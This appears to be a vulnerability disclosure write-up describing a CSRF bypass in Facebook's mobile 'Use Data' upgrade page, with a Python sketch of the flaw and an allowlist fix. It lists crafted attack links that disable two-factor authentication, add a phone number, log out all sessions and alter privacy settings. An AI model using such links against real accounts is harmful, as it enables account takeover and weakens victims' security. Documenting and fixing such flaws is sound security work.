Published On: 21 May 2019
CSRF Bypass in "Use Data" To View Photos and Videos
I was looking for an open redirect in Facebook Free (I didn't have internet that day) and came across a link like this: https://mbasic.facebook.com/free_fb/media/upgrade/… I added some links in the primary and secondary URI parameters, but it failed to redirect.
The vulnerability I discovered is that the page produces a fb_dtsg (which works like a CSRF hash), and the primary_uri goes into the action= of a form with method=POST.
The malicious link can therefore perform most of the possible processes.
Step 1
Malicious link:
https://mbasic.facebook.com/free_fb/media/upgrade/?ref=m_settings&secondary_uri&primary_uri[POST METHOD LINKS WHICH REQUIRES ONLY A fb_dtsg TO EXECUTE]
Step 2
I can create a form tag with the action I want, used in a method=POST form.
For example, if I want to turn off comment ranking, I will use this link:
https://mbasic.facebook.com/free_fb/media/upgrade/?ref=m_settings&secondary_uri&primary_uri=%2Fsettings%2Fsubscribe%2Fsave%2F%3Fsetting%3Dranked_comments%26rankedcommentsetting%3D1
It will create a form tag:
<form method="post" action="/settings/subscribe/save/?setting=ranked_comments&rankedcommentsetting=1&ref=m_settings"><input type="hidden" name="fb_dtsg" value="AQG0MX76NU5i:AQFxsjAGqiZR" autocomplete="off"><div class="v"><input value="Use Data" type="submit" class="w x y z ba"></div></form>
Then, when I hit "Use Data", the form is submitted together with the fb_dtsg produced by the link.
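The root cause in step 2 is that a request parameter is copied straight into the form's action while the same page embeds a valid fb_dtsg, so the token ends up protecting whatever endpoint the link author picked. As an added illustration (my own code, not Facebook's), here is that pattern next to a hardened version that only renders the token-bearing form for a fixed allowlist of same-origin paths; the allowed path and the token value are hypothetical placeholders.

```python
from html import escape
from typing import Optional
from urllib.parse import urlsplit

# Hypothetical: the only endpoint the "Use Data" form is meant to post to.
ALLOWED_ACTIONS = {"/free_fb/media/upgrade/confirm/"}


def render_upgrade_form_vulnerable(primary_uri: str, fb_dtsg: str) -> str:
    """The flawed pattern: the request parameter becomes the form action,
    and a valid CSRF token is shipped alongside it. Output encoding alone
    does not help, because the action itself is attacker-chosen."""
    return (
        f'<form method="post" action="{escape(primary_uri)}">'
        f'<input type="hidden" name="fb_dtsg" value="{escape(fb_dtsg)}">'
        '<input type="submit" value="Use Data"></form>'
    )


def safe_action(primary_uri: str) -> Optional[str]:
    """Return a usable action only if primary_uri is a relative path on the
    allowlist; reject absolute/protocol-relative URLs and any other path.
    The query string and fragment are dropped so the caller cannot smuggle
    extra parameters (e.g. setting=... values) into the POST target."""
    parts = urlsplit(primary_uri)
    if parts.scheme or parts.netloc:
        return None
    if parts.path not in ALLOWED_ACTIONS:
        return None
    return parts.path


def render_upgrade_form_hardened(primary_uri: str, fb_dtsg: str) -> Optional[str]:
    """Hardened pattern: no form (and no token) is rendered unless the
    action survives the allowlist check; the caller should answer 400."""
    action = safe_action(primary_uri)
    if action is None:
        return None
    return (
        f'<form method="post" action="{escape(action)}">'
        f'<input type="hidden" name="fb_dtsg" value="{escape(fb_dtsg)}">'
        '<input type="submit" value="Use Data"></form>'
    )
```

A useful detection signal on the server side is any request to the upgrade page whose primary_uri fails safe_action(); under the hardened version those should be rare and are worth logging.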
Step 3
These are some links that are covered by the bypass.
COMMENT RANKING OFF
https://mbasic.facebook.com/free_fb/media/upgrade/?ref=m_settings&secondary_uri&primary_uri=%2Fsettings%2Fsubscribe%2Fsave%2F%3Fsetting%3Dranked_comments%26rankedcommentsetting%3D1
WHO CAN FOLLOW ME (FRIENDS)
https://mbasic.facebook.com/free_fb/media/upgrade/?ref=m_settings&secondary_uri&primary_uri=%2Fsettings%2Fsubscribe%2Fsave%2F%3Fsetting%3Dfollow_optin
LIMIT OLD POST
https://mbasic.facebook.com/free_fb/media/upgrade/?ref=m_settings&secondary_uri&primary_uri=%2Fprivacy%2Ftouch%2Fmasher%2Fwrite
SUPPORT INBOX NOTIFICATION OFF
https://mbasic.facebook.com/free_fb/media/upgrade/?ref=m_settings&secondary_uri&primary_uri=%2Fsupport%2Fnotifications%2Fdo_edit%2F%3Fdom%3Du_0_0
ACCOUNT DELETION FROM YES TO NO
https://mbasic.facebook.com/free_fb/media/upgrade/?ref=m_settings&secondary_uri&primary_uri=%2Fsettings%2Flegacy_contact%2Fdelete_account_save%2F%3Fref%3Dm_settings
ADDING PHONE NUMBER TO AN ACCOUNT
https://mbasic.facebook.com/free_fb/media/upgrade/?primary_uri=%2Fphoneacqwrite%2F%3Fcountry%3DPH%26state%3D1%26source%3Dm_account%26promo_type%26initial_contact_point%26contact_point%3D9950829805%26verification_type%3Dcode_sms%26activate_sms%3D1%26qp_id%3D0%26qp_conversion_token%26prefill_score%3D0&secondary_uri
LOGOUT ALL SESSIONS
https://mbasic.facebook.com/free_fb/media/upgrade/?secondary_uri&primary_uri=%2Fsecurity%2Fsettings%2Fsessions%2Flog_out_all%2F%3Fredirect%3D1
CHANGING LANGUAGE TO FILIPINO
https://mbasic.facebook.com/free_fb/media/upgrade/?secondary_uri&primary_uri=%2Fa%2Flanguage.php%3Fl%3Dtl_PH
TURNING OFF TWO-FACTOR AUTHENTICATION
https://mbasic.facebook.com/free_fb/media/upgrade/?secondary_uri&primary_uri=%2Fa%2Fsettings%2Fsecurity%2Fapprovals